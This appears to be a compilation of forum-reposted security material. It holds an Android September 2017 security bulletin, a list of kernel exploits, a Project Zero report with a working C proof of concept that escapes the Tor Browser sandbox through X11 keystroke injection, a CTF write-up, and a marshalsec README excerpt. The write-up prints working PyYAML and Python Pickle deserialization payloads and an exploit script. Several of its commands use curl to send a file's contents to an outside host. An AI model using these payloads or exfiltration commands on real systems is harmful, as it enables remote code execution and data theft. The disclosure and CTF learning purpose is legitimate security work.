warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play. 2017-09-01 security patch level—Vulnerability details In the sections below, we provide details for each of the security vulnerabilities that apply to the 2017-09-01 patch level. Vulnerabilities are grouped under the component that they affect. There is a description of the issue and a table with the CVE, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). 
When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Framework The most severe vulnerability in this section could enable a local malicious application to bypass user interaction requirements in order to gain access to additional permissions. CVE References Type Severity Updated AOSP versions CVE-2017-0752 A-62196835 EoP High 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 Libraries The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of an unprivileged process. CVE References Type Severity Updated AOSP versions CVE-2017-0753 A-62218744 RCE High 7.1.1, 7.1.2, 8.0 CVE-2017-6983 A-63852675 RCE High 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0755 A-32178311 EoP High 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 Media Framework The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process. CVE References Type Severity Updated AOSP versions CVE-2017-0756 A-34621073 RCE Critical 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 CVE-2017-0757 A-36006815 RCE Critical 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 CVE-2017-0758 A-36492741 RCE Critical 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 CVE-2017-0759 A-36715268 RCE Critical 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 CVE-2017-0760 A-37237396 RCE Critical 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 CVE-2017-0761 A-38448381 RCE Critical 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0762 A-62214264 RCE Critical 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 CVE-2017-0763 A-62534693 RCE Critical 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0764 A-62872015 RCE Critical 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0765 A-62872863 RCE Critical 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0766 A-37776688 RCE High 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 CVE-2017-0767 A-37536407 EoP High 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 CVE-2017-0768 A-62019992 EoP High 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0769 A-37662122 EoP High 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0770 A-38234812 EoP High 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0771 A-37624243 DoS High 7.0, 7.1.1, 7.1.2 CVE-2017-0772 A-38115076 DoS High 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0773 A-37615911 DoS High 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0774 A-62673844 DoS High 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 CVE-2017-0775 A-62673179 DoS High 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0776 A-38496660 ID Moderate 7.0, 7.1.1, 7.1.2, 8.0 DoS High 6.0.1 CVE-2017-0777 A-38342499 ID Moderate 7.0, 7.1.1, 7.1.2 DoS High 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1 CVE-2017-0778 A-62133227 ID Moderate 7.0, 7.1.1, 7.1.2 DoS High 5.0.2, 5.1.1, 6.0, 6.0.1 CVE-2017-0779 A-38340117 ID Moderate 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 Runtime The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to cause an application to hang. 
CVE References Type Severity Updated AOSP versions CVE-2017-0780 A-37742976 DoS High 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 System The most severe vulnerability in this section could enable a local malicious application to bypass user interaction requirements in order to gain access to user data. CVE References Type Severity Updated AOSP versions CVE-2017-0784 A-37287958 EoP Moderate 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 2017-09-05 security patch level—Vulnerability details In the sections below, we provide details for each of the security vulnerabilities that apply to the 2017-09-05 patch level. Vulnerabilities are grouped under the component that they affect and include details such as the CVE, associated references, type of vulnerability, severity, component (where applicable), and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Broadcom components The most severe vulnerability in this section could enable a proximate attacker using a specially crafted file to execute arbitrary code within the context of a privileged process. CVE References Type Severity Component CVE-2017-7065 A-62575138* B-V2017061202 RCE Critical Wi-Fi driver CVE-2017-0786 A-37351060* B-V2017060101 EoP High Wi-Fi driver CVE-2017-0787 A-37722970* B-V2017053104 EoP Moderate Wi-Fi driver CVE-2017-0788 A-37722328* B-V2017053103 EoP Moderate Wi-Fi driver CVE-2017-0789 A-37685267* B-V2017053102 EoP Moderate Wi-Fi driver CVE-2017-0790 A-37357704* B-V2017053101 EoP Moderate Wi-Fi driver CVE-2017-0791 A-37306719* B-V2017052302 EoP Moderate Wi-Fi driver CVE-2017-0792 A-37305578* B-V2017052301 ID Moderate Wi-Fi driver Imgtk components The most severe vulnerability in this section could enable a local malicious application to access data outside of its permission levels. CVE References Type Severity Component CVE-2017-0793 A-35764946* ID High Memory subsystem Kernel components The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process. CVE References Type Severity Component CVE-2017-8890 A-38413975 Upstream kernel RCE Critical Networking subsystem CVE-2017-9076 A-62299478 Upstream kernel EoP High Networking subsystem CVE-2017-9150 A-62199770 Upstream kernel ID High Linux kernel CVE-2017-7487 A-62070688 Upstream kernel EoP High IPX protocol driver CVE-2017-6214 A-37901268 Upstream kernel DoS High Networking subsystem CVE-2017-6346 A-37897645 Upstream kernel EoP High Linux kernel CVE-2017-5897 A-37871211 Upstream kernel ID High Networking subsystem CVE-2017-7495 A-62198330 Upstream kernel ID High File system CVE-2017-7616 A-37751399 Upstream kernel ID Moderate Linux kernel CVE-2017-12146 A-35676417 Upstream kernel EoP Moderate Linux kernel CVE-2017-0794 A-35644812* EoP Moderate SCSI driver MediaTek components The most severe vulnerability in this section could enable a local malicious application to execute arbitrary code within the context of a privileged process. 
CVE References Type Severity Component CVE-2017-0795 A-36198473* M-ALPS03361480 EoP High Accessory detector driver CVE-2017-0796 A-62458865* M-ALPS03353884 M-ALPS03353886 M-ALPS03353887 EoP High AUXADC driver CVE-2017-0797 A-62459766* M-ALPS03353854 EoP High Accessory detector driver CVE-2017-0798 A-36100671* M-ALPS03365532 EoP High Kernel CVE-2017-0799 A-36731602* M-ALPS03342072 EoP High Lastbus CVE-2017-0800 A-37683975* M-ALPS03302988 EoP High TEEI CVE-2017-0801 A-38447970* M-ALPS03337980 EoP High LibMtkOmxVdec CVE-2017-0802 A-36232120* M-ALPS03384818 EoP Moderate Kernel CVE-2017-0803 A-36136137* M-ALPS03361477 EoP Moderate Accessory detector driver CVE-2017-0804 A-36274676* M-ALPS03361487 EoP Moderate MMC driver Qualcomm components The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process. CVE References Type Severity Component CVE-2017-11041 A-36130225* QC-CR#2053101 RCE Critical LibOmxVenc CVE-2017-10996 A-38198574 QC-CR#901529 ID High Linux kernel CVE-2017-9725 A-38195738 QC-CR#896659 EoP High Memory subsystem CVE-2017-9724 A-38196929 QC-CR#863303 EoP High Linux kernel CVE-2017-8278 A-62379474 QC-CR#2013236 EoP High Audio driver CVE-2017-10999 A-36490777* QC-CR#2010713 EoP Moderate IPA driver CVE-2017-11001 A-36815555* QC-CR#270292 ID Moderate Wi-Fi driver CVE-2017-11002 A-37712167* QC-CR#2058452 QC-CR#2054690 QC-CR#2058455 ID Moderate Wi-Fi driver CVE-2017-8250 A-62379051 QC-CR#2003924 EoP Moderate GPU driver CVE-2017-9677 A-62379475 QC-CR#2022953 EoP Moderate Audio driver CVE-2017-10998 A-38195131 QC-CR#108461 EoP Moderate Audio driver CVE-2017-9676 A-62378596 QC-CR#2016517 ID Moderate File system CVE-2017-8280 A-62377236 QC-CR#2015858 EoP Moderate WLAN driver CVE-2017-8251 A-62379525 QC-CR#2006015 EoP Moderate Camera driver CVE-2017-10997 A-33039685* QC-CR#1103077 EoP Moderate PCI driver CVE-2017-11000 A-36136563* QC-CR#2031677 EoP Moderate Camera driver CVE-2017-8247 A-62378684 QC-CR#2023513 EoP Moderate Camera driver CVE-2017-9720 A-36264696* QC-CR#2041066 EoP Moderate Camera driver CVE-2017-8277 A-62378788 QC-CR#2009047 EoP Moderate Video driver CVE-2017-8281 A-62378232 QC-CR#2015892 ID Moderate Automotive multimedia CVE-2017-11040 A-37567102* QC-CR#2038166 ID Moderate Video driver Google device updates This table contains the security patch level in the latest over-the-air update (OTA) and firmware images for Google devices. The Google device OTAs may also contain additional updates. The Google device firmware images are available on the Google Developer site. Pixel, Pixel XL, Pixel C, Nexus Player, Nexus 5X, and Nexus 6P devices will be receiving the September security patches as part of the upgrade to Android Oreo. Google device Security patch level Pixel / Pixel XL 2017-09-05 Nexus 5X 2017-09-05 Nexus 6 2017-09-05 Nexus 6P 2017-09-05 Nexus 9 2017-09-05 Nexus Player 2017-09-05 Pixel C 2017-09-05 Acknowledgements We would like to thank these researchers for their contributions: CVEs Researchers CVE-2017-11000 Baozeng Ding (@sploving), Chengming Yang, and Yang Song of Alibaba Mobile Security Group CVE-2017-0800, CVE-2017-0798 Chengming Yang, Baozeng Ding, and Yang Song of Alibaba Mobile Security Group CVE-2017-0765 Chi Zhang, Mingjian Zhou (@Mingjian_Zhou), and Xuxian Jiang of C0RE Team CVE-2017-0758 Chong Wang and 金哲 (Zhe Jin) of Chengdu Security Response Center, Qihoo 360 Technology Co. Ltd. 
CVE-2017-0752 Cong Zheng (@shellcong), Wenjun Hu, Xiao Zhang, and Zhi Xu of Palo Alto Networks CVE-2017-0801 Dacheng Shao, Mingjian Zhou (@Mingjian_Zhou), and Xuxian Jiang of C0RE Team CVE-2017-0775, CVE-2017-0774, CVE-2017-0771 Elphet and Gong Guang of Alpha Team, Qihoo 360 Technology Co. Ltd. CVE-2017-0784 En He (@heeeeen4x) and Bo Liu of MS509Team CVE-2017-10997 Gengjia Chen (@chengjia4574) and pjf of IceSword Lab, Qihoo 360 Technology Co. Ltd. CVE-2017-0786, CVE-2017-0792, CVE-2017-0791, CVE-2017-0790, CVE-2017-0789, CVE-2017-0788, CVE-2017-0787 Hao Chen and Guang Gong of Alpha Team, Qihoo 360 Technology Co. Ltd. CVE-2017-0802 Jake Corina and Nick Stephens of Shellphish Grill Team CVE-2017-0780 Jason Gu and Seven Shen of Trend Micro CVE-2017-0769 Mingjian Zhou (@Mingjian_Zhou), Dacheng Shao, and Xuxian Jiang of C0RE Team CVE-2017-0794, CVE-2017-9720, CVE-2017-11001, CVE-2017-10999, CVE-2017-0766 Pengfei Ding (丁鹏飞), Chenfu Bao (包沉浮), Lenx Wei (韦韬) of Baidu X-Lab (百度安全实验室) CVE-2017-0772 Seven Shen of Trend Micro CVE-2017-0757 Vasily Vasiliev CVE-2017-0768, CVE-2017-0779 Wenke Dou, Mingjian Zhou (@Mingjian_Zhou), and Xuxian Jiang of C0RE Team CVE-2017-0759 Weichao Sun of Alibaba Inc. CVE-2017-0796 Xiangqian Zhang, Chengming Yang, Baozeng Ding, and Yang Song of Alibaba Mobile Security Group CVE-2017-0753 Yangkang (@dnpushme) and hujianfei of Qihoo360 Qex Team CVE-2017-12146 Yonggang Guo (@guoygang) of IceSword Lab, Qihoo 360 Technology Co. Ltd. CVE-2017-0767 Yongke Wang and Yuebin Sun of Tencent's Xuanwu Lab CVE-2017-0804, CVE-2017-0803, CVE-2017-0799, CVE-2017-0795 Yu Pan and Yang Dai of Vulpecker Team, Qihoo 360 Technology Co. Ltd CVE-2017-0760 Zinuo Han and 金哲 (Zhe Jin) of Chengdu Security Response Center, Qihoo 360 Technology Co. Ltd. CVE-2017-0764, CVE-2017-0761, CVE-2017-0776, CVE-2017-0777 Zinuo Han of Chengdu Security Response Center, Qihoo 360 Technology Co. Ltd. Common questions and answers This section answers common questions that may occur after reading this bulletin. 1. How do I determine if my device is updated to address these issues? To learn how to check a device's security patch level, read the instructions on the Pixel and Nexus update schedule. Security patch levels of 2017-09-01 or later address all issues associated with the 2017-09-01 security patch level. Security patch levels of 2017-09-05 or later address all issues associated with the 2017-09-05 security patch level and all previous patch levels. Device manufacturers that include these updates should set the patch string level to: [ro.build.version.security_patch]:[2017-09-01] [ro.build.version.security_patch]:[2017-09-05] 2. Why does this bulletin have two security patch levels? This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level. Devices that use the 2017-09-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins. Devices that use the security patch level of 2017-09-05 or newer must include all applicable patches in this (and previous) security bulletins. Partners are encouraged to bundle the fixes for all issues they are addressing in a single update. 3. What do the entries in the Type column mean? 
Entries in the Type column of the vulnerability details table reference the classification of the security vulnerability. Abbreviation Definition RCE Remote code execution EoP Elevation of privilege ID Information disclosure DoS Denial of service N/A Classification not available 4. What do the entries in the References column mean? Entries under the References column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs. Prefix Reference A- Android bug ID QC- Qualcomm reference number M- MediaTek reference number N- NVIDIA reference number B- Broadcom reference number 5. What does a * next to the Android bug ID in the References column mean? Issues that are not publicly available have a * next to the Android bug ID in the References column. The update for that issue is generally contained in the latest binary drivers for Nexus devices available from the Google Developer site. Versions Version Date Notes 1.0 September 5, 2017 Bulletin published. Except as otherwise noted, the content of this page is licensed under the Creative Commons Attribution 3.0 License, and code samples are licensed under the Apache 2.0 License. For details, see our Site Policies. Java is a registered trademark of Oracle and/or its affiliates. Last updated September 5, 2017. Sursa: https://source.android.com/security/bulletin/2017-09-01
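As a quick practical complement to question 1 above: on a device with USB debugging enabled, the current patch level can be read directly over adb (a hedged example; the property name is the one quoted in the bulletin):
adb shell getprop ro.build.version.security_patch
A device fully patched against this bulletin should report 2017-09-05 or a later date.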
  15. kernel-exploits CVE-2016-2384: a double-free in USB MIDI driver CVE-2016-9793: a signedness issue with SO_SNDBUFFORCE and SO_RCVBUFFORCE socket options CVE-2017-6074: a double-free in DCCP protocol CVE-2017-7308: a signedness issue in AF_PACKET sockets CVE-2017-1000112: a memory corruption due to UFO to non-UFO path switch Sursa: https://github.com/xairy/kernel-exploits
  16. Tor: Linux sandbox breakout via X11

Reported by jannh@google.com, Jun 13

**EDIT: I mixed up two different sandboxes; see the comment below for a correction.**

From inside the Linux sandbox described in <https://blog.torproject.org/blog/tor-browser-70-released>, it is still possible to talk to the X server without any restrictions. This means that a compromised browser can e.g. use the XTEST X protocol extension (<https://www.x.org/releases/X11R7.7/doc/xextproto/xtest.html>) to fake arbitrary keyboard and mouse events, directed at arbitrary windows. This permits a sandbox breakout, e.g. by injecting keypresses into a background window.

<https://trac.torproject.org/projects/tor/wiki/doc/TorBrowser/Sandbox/Linux#HowdoIprotectmyselffromXexploits> mentions that the X server is reachable, but it sounds like the author didn't realize that a normal connection to the X server permits sandbox breakouts by design.

To reproduce:

Install Debian Jessie with the Xfce4 desktop environment and with backports enabled. Install bubblewrap and xdotool.
Install the sandboxed Tor browser from <https://www.torproject.org/dist/torbrowser/7.0a4/sandbox-0.0.6-linux64.zip>.
Launch the sandboxed Tor browser, use the default configuration. When the browser has launched, close it.
Delete ~/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox.
Store the following as ~/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox.c:

=========================
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void){
  int status;
  setenv("LD_LIBRARY_PATH", "/home/amnesia/sandboxed-tor-browser/tor-browser", 1);
  if (fork() == 0) {
    execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "key", "alt+F2", "sleep", "1", "type", "xfce4-terminal", NULL);
    perror("fail");
    return 0;
  }
  wait(&status);
  if (fork() == 0) {
    execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "sleep", "1", "key", "Return", "sleep", "1", "type", "id", NULL);
    perror("fail");
    return 0;
  }
  wait(&status);
  if (fork() == 0) {
    execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "sleep", "1", "key", "Return", NULL);
    perror("fail");
    return 0;
  }
  wait(&status);
  while (1) sleep(1000);
  return 0;
}
=========================

In ~/.local/share/sandboxed-tor-browser/tor-browser/Browser, run "gcc -static -o firefox firefox.c".
Run "cp /usr/bin/xdotool /usr/lib/x86_64-linux-gnu/* ~/.local/share/sandboxed-tor-browser/tor-browser/".
Now run the launcher for the sandboxed browser again. Inside the sandbox, the new firefox binary will connect to the X11 server and send fake keypresses to open a terminal outside the sandbox and type into it.

There are probably similar issues with pulseaudio when it's enabled; I suspect that it's possible to e.g. use the pulseaudio socket to load pulseaudio modules with arbitrary parameters, which would e.g. permit leaking parts of files outside the sandbox by using them as authentication cookie files for modules that implement audio streaming over the network.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.

Sursa: https://bugs.chromium.org/p/project-zero/issues/detail?id=1293&desc=2
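The same keystroke-injection idea is easy to prototype outside the sandbox as well. Below is a rough Python equivalent of the C PoC above, assuming xdotool is installed and an X session is available; the target command and timings are placeholders, not part of the original report:

import subprocess
import time

def xdo(*args):
    # Shell out to xdotool; any client connected to the X server can do this,
    # because the server does not restrict XTEST requests.
    subprocess.call(["xdotool"] + list(args))

# Open the Xfce application finder, launch a terminal, and type into it.
xdo("key", "alt+F2")
time.sleep(1)
xdo("type", "xfce4-terminal")
xdo("key", "Return")
time.sleep(1)
xdo("type", "id")
xdo("key", "Return")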
  17. Exploiting Python Deserialization Vulnerabilities

Over the weekend, I had a chance to participate in the ToorConCTF (https://twitter.com/toorconctf) which gave me my first experience with serialization flaws in Python. Two of the challenges we solved included Python libraries that appeared to be accepting serialized objects and ended up being vulnerable to Remote Code Execution (RCE). Since I struggled a bit to find reference material online on the subject, I decided to make a blog post documenting my discoveries, exploit code and solutions. In this blog post, I will cover how to exploit deserialization vulnerabilities in the PyYAML (a Python YAML library) and Python Pickle libraries (a Python serialization library). Let's get started!

Background

Before diving into the challenges, it's probably important to start with the basics. If you are unfamiliar with deserialization vulnerabilities, the following excerpt from @breenmachine at Fox Glove Security (https://foxglovesecurity.com) probably explains it the best.

"Unserialize vulnerabilities are a vulnerability class. Most programming languages provide built-in ways for users to output application data to disk or stream it over the network. The process of converting application data to another format (usually binary) suitable for transportation is called serialization. The process of reading data back in after it has been serialized is called unserialization. Vulnerabilities arise when developers write code that accepts serialized data from users and attempt to unserialize it for use in the program. Depending on the language, this can lead to all sorts of consequences, but most interesting, and the one we will talk about here is remote code execution."

PyYAML Deserialization Remote Code Execution

In the first challenge, we were presented with a URL to a web page which included a YAML document upload form. After Googling for YAML document examples, I crafted the following YAML file and proceeded to upload it to get a feel for the functionality of the form.

HTTP Request

POST / HTTP/1.1
Host: ganon.39586ebba722e94b.ctf.land:8001
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://ganon.39586ebba722e94b.ctf.land:8001/
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------200783363553063815533894329
Content-Length: 857

-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="file"; filename="test.yaml"
Content-Type: application/x-yaml

--- # A list of global configuration variables # # Uncomment lines as needed to edit default settings. # # Note this only works for settings with default values.
Some commands like --rerun <module> # # or --force-ccd n will have to be set in the command line (if you need to) # # # This line is really important to set up properly # project_path: '/home/user' # # # The rest of the settings will default to the values set unless you uncomment and change them # #resize_to: 2048 'test' -----------------------------200783363553063815533894329 Content-Disposition: form-data; name="upload" -----------------------------200783363553063815533894329-- HTTP/1.1 200 OK Server: gunicorn/19.7.1 Date: Sun, 03 Sep 2017 02:50:16 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 2213 Set-Cookie: session=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/ <!-- begin message block --> <div class="container flashed-messages"> <div class="row"> <div class="col-md-12"> <div class="alert alert-info" role="alert"> test.yaml is valid YAML </div> </div> </div> </div> <!-- end message block --> </div> </div> <div class="container main" > <div class="row"> <div class="col-md-12 main"> <code></code> As you can see, the document was uploaded successfully but only displayed whether the upload was a valid YAML document or not. At this point, I wasn't sure exactly what I was supposed to do, but after looking more closely at the response, I noticed that the server was running gunicorn/19.7.1... A quick search for gunicorn revealed that it is a Python web server which lead me to believe the YAML parser was in fact a Python library. From here, I decided to search for Python YAML vulnerabilities and discovered a few blog posts referencing PyYAML deserialization flaws. It was here that I came across the following exploit code for exploiting PyYAML deserialization vulnerabilities. The important thing here is the following code which runs the 'ls' command if the application is vulnerable to PyYaml deserialization: !!map { ? !!str "goodbye" : !!python/object/apply:subprocess.check_output [ !!str "ls", ], } Going blind into the exploitation phase, I decided to give it a try and inject the payload into the document contents being uploaded using Burpsuite... HTTP Request POST / HTTP/1.1 Host: ganon.39586ebba722e94b.ctf.land:8001 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://ganon.39586ebba722e94b.ctf.land:8001/ Connection: close Content-Type: multipart/form-data; boundary=---------------------------200783363553063815533894329 Content-Length: 445 -----------------------------200783363553063815533894329 Content-Disposition: form-data; name="file"; filename="test.yaml" Content-Type: application/x-yaml --- !!map { ? !!str "goodbye" : !!python/object/apply:subprocess.check_output [ !!str "ls", ], } -----------------------------200783363553063815533894329 Content-Disposition: form-data; name="upload" -----------------------------200783363553063815533894329-- <ul><li><code>goodbye</code> : <code>Dockerfile README.md app.py app.pyc bin boot dev docker-compose.yml etc flag.txt home lib lib64 media mnt opt proc requirements.txt root run sbin srv static sys templates test.py tmp usr var </code></li></ul> As you can see, the payload worked and we now have code execution on the target server! Now, all we need to do is read the flag.txt... I quickly discovered a limitaton of the above method was strictly limited to single commands (ie. ls, whoami, etc.) 
which meant there was no way to read the flag using this method. I then discovered that the os.system Python call could also be used to achieve RCE and was capable of running multiple commands inline. However, I was quickly disappointed after trying this and seeing that the result just returned "0" and I could not see my command output. After struggling to find the solution, my teammate @n0j pointed out that os.system ["command_here"] only returns a "0" exit code if the command is successful, and is blind due to how Python handles sub process execution. It was here that I tried injecting the following command to read the flag: curl https://crowdshield.com/?`cat flag.txt`

HTTP Request

POST / HTTP/1.1
Host: ganon.39586ebba722e94b.ctf.land:8001
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://ganon.39586ebba722e94b.ctf.land:8001/
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------200783363553063815533894329
Content-Length: 438

-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="file"; filename="test.yaml"
Content-Type: application/x-yaml

---
"goodbye": !!python/object/apply:os.system ["curl https://crowdshield.com/?`cat flag.txt`"]

-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="upload"
-----------------------------200783363553063815533894329--

</div>
<div class="container main" >
<div class="row">
<div class="col-md-12 main">
<ul><li><code>goodbye</code> : <code>0</code></li></ul>
</div>
</div>
</div>

After much trial and error, the flag was ours along with 250pts in the CTF!

Remote Apache Logs

34.214.16.74 - - [02/Sep/2017:21:12:11 -0700] "GET /?ItsCaptainCrunchThatsZeldasFavorite HTTP/1.1" 200 1937 "-" "curl/7.38.0"

Python Pickle Deserialization

In the next CTF challenge, we were provided a host and port to connect to (ganon.39586ebba722e94b.ctf.land:8000). After initial connection however, no noticeable output was displayed, so I proceeded to fuzz the open port with random characters and HTTP requests to see what happened. It wasn't until I tried injecting a single "'" character that I received the error below:

# nc -v ganon.39586ebba722e94b.ctf.land 8000
ec2-34-214-16-74.us-west-2.compute.amazonaws.com [34.214.16.74] 8000 (?) open
cexceptions
AttributeError
p0
(S"Unpickler instance has no attribute 'persistent_load'"
p1
tp2
Rp3
.

The thing that stood out most was the (S"Unpickler instance has no attribute 'persistent_load'" portion of the output. I immediately searched Google for the error, which revealed several references to Python's serialization library called "Pickle". It soon became clear that this was likely another Python deserialization flaw that had to be exploited in order to obtain the flag. I then searched Google for "Python Pickle deserialization exploits" and discovered a similar PoC to the code below. After tinkering with the code a bit, I had a working exploit that would send Pickle serialized objects to the target server with the commands of my choice.

Exploit Code

#!/usr/bin/python
# Python Pickle De-serialization Exploit by 1N3@CrowdShield - https://crowdshield.com
#
import os
import cPickle
import socket

# Exploit that we want the target to unpickle
class Exploit(object):
    def __reduce__(self):
        # Note: this will only list files in your directory.
        # It is a proof of concept.
        return (os.system, ('curl https://crowdshield.com/.injectx/rce.txt?`cat flag.txt`',))

def serialize_exploit():
    shellcode = cPickle.dumps(Exploit())
    return shellcode

def insecure_deserialize(exploit_code):
    cPickle.loads(exploit_code)

if __name__ == '__main__':
    shellcode = serialize_exploit()
    print shellcode

    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    soc.connect(("ganon.39586ebba722e94b.ctf.land", 8000))
    print soc.recv(1024)
    soc.send(shellcode)
    print soc.recv(1024)
    soc.close()

Exploit PoC

# python python_pickle_poc.py
cposix
system
p1
(S"curl https://crowdshield.com/rce.txt?`cat flag.txt`"
p2
tp3
Rp4
.

Much to my surprise, this worked and I could see the contents of the flag in my Apache logs!

Remote Apache Logs

34.214.16.74 - - [03/Sep/2017:11:15:02 -0700] "GET /rce.txt?UsuallyLinkPrefersFrostedFlakes HTTP/1.1" 404 2102 "-" "curl/7.38.0"

Conclusion

So there you have it. Two practical examples of Python deserialization which can be used to obtain Remote Code Execution (RCE) in remote applications. I had a lot of fun competing in the CTF and learned a lot in the process, but due to other obligations and time constraints I wasn't able to put my entire focus into the CTF. In the end, our team "SavageSubmarine" placed 7th overall with @hackerbyhobby, @baltmane and @n0j (http://n0j.github.io/). Till next time... -1N3

Published by CrowdShield on 09/04/2017

Sursa: https://crowdshield.com/blog.php?name=exploiting-python-deserialization-vulnerabilities
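If you want to play with both primitives locally before pointing them at a remote target, the core behaviour can be reproduced in a few lines. This is a minimal local sketch of my own (not from the write-up), assuming PyYAML is installed; note that PyYAML 5.1+ needs the explicit unsafe Loader shown below, and the "id" command is just a harmless placeholder:

import pickle
import subprocess
import yaml

class Demo(object):
    def __reduce__(self):
        # __reduce__ tells pickle how to rebuild the object: returning a
        # (callable, args) tuple means the callable runs during deserialization.
        return (subprocess.check_output, (["id"],))

print(pickle.loads(pickle.dumps(Demo())))   # "id" executes inside pickle.loads

doc = '!!python/object/apply:subprocess.check_output [[ "id" ]]'
print(yaml.load(doc, Loader=yaml.Loader))   # the unsafe loader resolves python/object/apply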
  18. Java Unmarshaller Security - Turning your data into code execution

Paper

It's been more than two years since Chris Frohoff and Gabriel Lawrence have presented their research into Java object deserialization vulnerabilities ultimately resulting in what can be readily described as the biggest wave of remote code execution bugs in Java history. Research into that matter indicated that these vulnerabilities are not exclusive to mechanisms as expressive as Java serialization or XStream, but some could possibly be applied to other mechanisms as well. This paper presents an analysis, including exploitation details, of various Java open-source marshalling libraries that allow(ed) for unmarshalling of arbitrary, attacker supplied, types and shows that no matter how this process is performed and what implicit constraints are in place it is prone to similar exploitation techniques. Full paper is at marshalsec.pdf

Disclaimer

All information and code is provided solely for educational purposes and/or testing your own systems for these vulnerabilities.

Usage

Java 8 required. Build using maven mvn clean package -DskipTests.

Run as java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] where

-a - generates/tests all payloads for that marshaller
-t - runs in test mode, unmarshalling the generated payloads after generating them.
-v - verbose mode, e.g. also shows the generated payload in test mode.
gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller.
arguments - Gadget specific arguments

Payload generators for the following marshallers are included (marshaller: gadget impact):

BlazeDSAMF(0|3|X): JDK only escalation to Java serialization; various third party libraries RCEs
Hessian|Burlap: various third party RCEs
Castor: dependency library RCE
